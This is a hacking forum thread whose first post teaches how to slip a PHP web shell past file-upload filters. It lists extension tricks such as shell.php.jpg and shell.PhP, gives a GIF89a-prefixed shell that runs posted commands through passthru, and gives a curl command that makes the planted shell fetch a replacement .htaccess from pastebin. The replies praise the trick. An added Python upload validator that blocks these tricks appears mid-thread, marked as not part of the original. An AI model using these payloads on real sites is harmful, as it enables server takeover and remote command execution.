Simple Trick to Bypass File Upload Problem
#1
We all know there are many ways to upload files / shell into the website. But this time I will share one trick that you may never have tried. Have you ever uploaded a file / shell, then when you access it, your file / shell is downloaded instead? It can be caused by .htaccess:

Quote:AddType application/octet-stream .php

Then how will we manipulate it? Maybe you already know about:
  • Bypassing the Extension Black Listing.
Quote:shell.php1, shell.php2, etc.
  • Bypass Case Sensitive Filter.
Quote:shell.PhP, shell.pHp1, etc.
  • Bypass Using Double Extension.
Quote:shell.php.jpg, shell.php.pjpeg, shell.php;jpg, etc.


But now, I'll add a little about one way, and also maybe this is a fusion of the above ways.

Fool Server Side Check Using GIF89a; Header.
Sometimes a server-side content signature check can be fooled using a "GIF89a;" header in your shell. Then you can save the shell with .php, .php.pjpeg or many of the extensions above. So here's an example:

PHP Code:
GIF89a;
<?php
passthru($_POST['cmd']); __halt_compiler(); //or you can insert your complete shell code
?>

Open your terminal, then type the command below:

Quote:curl -d cmd="wget https://pastebin.com/raw/H8Ju85Jp -O .htaccess" urlshell

There I replace the default .htaccess server with my own .htaccess.
After that, you can re-upload your own php shell using .abay extension (or you can change it). Or you can use wget instead.

It's all for this tutorial, will soon draw you back with another tutorial. Sorry if my language is messy. If you guys have an easier trick, you can write it in the comment field. Thanks!
Reply
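Added example, not part of the original post: a server-side upload check in Python that rejects the filename tricks listed in post #1 and shows that a magic-byte check on its own accepts a "GIF89a;" polyglot. The function name, the allowlist, the regexes and the sample bytes are assumptions constructed for illustration.

```python
import re
import secrets

# Allowlisted extension -> magic bytes the file must start with (assumed policy).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
# Exactly one dot and conservative characters only: rejects shell.php.jpg,
# shell.php;jpg, shell.php1, shell.pjpeg and dotfiles such as .htaccess.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z]{3,4})")
# Tripwire only: a short "<?" tag can occur by chance in binary image data,
# so only long markers are matched. This is not the primary control.
SCRIPT_RE = re.compile(rb"<\?php|__halt_compiler", re.IGNORECASE)

# Constructed samples: a polyglot shaped like the thread's file (harmless
# body) and a minimal 1x1 GIF.
POLYGLOT = b"GIF89a;\n<?php echo 'x'; __halt_compiler(); ?>"
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

def check_upload(filename, data):
    """Return (reasons, stored_name); stored_name is None when rejected."""
    reasons = []
    m = NAME_RE.fullmatch(filename)
    ext = m.group(1).lower() if m else None  # lowercase defeats .PhP casing
    if ext not in MAGIC:
        reasons.append("name: not a single allowlisted image extension")
    elif not data.startswith(MAGIC[ext]):
        reasons.append("content: magic bytes do not match extension")
    if SCRIPT_RE.search(data):
        reasons.append("content: embedded script marker")
    if reasons:
        return reasons, None
    # Never store under the client-supplied name.
    return reasons, f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    for name in ("shell.php", "shell.PhP", "shell.php.jpg", "avatar.gif"):
        print(name, check_upload(name, POLYGLOT))
    print("avatar.gif (real)", check_upload("avatar.gif", REAL_GIF))
```

These checks are a first filter; the upload directory should also be served so that scripts in it are never executed and an uploaded .htaccess is not honored.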
#2
Not a bad thread! I didn't actually know about the GIF89a method before. I made a similar thread a while ago, feel free to check it out if you want some more tips & tricks. https://greysec.net/showthread.php?tid=1455
#3
I've checked your thread before, and that's what inspired me to post this thread, lol. You're awesome!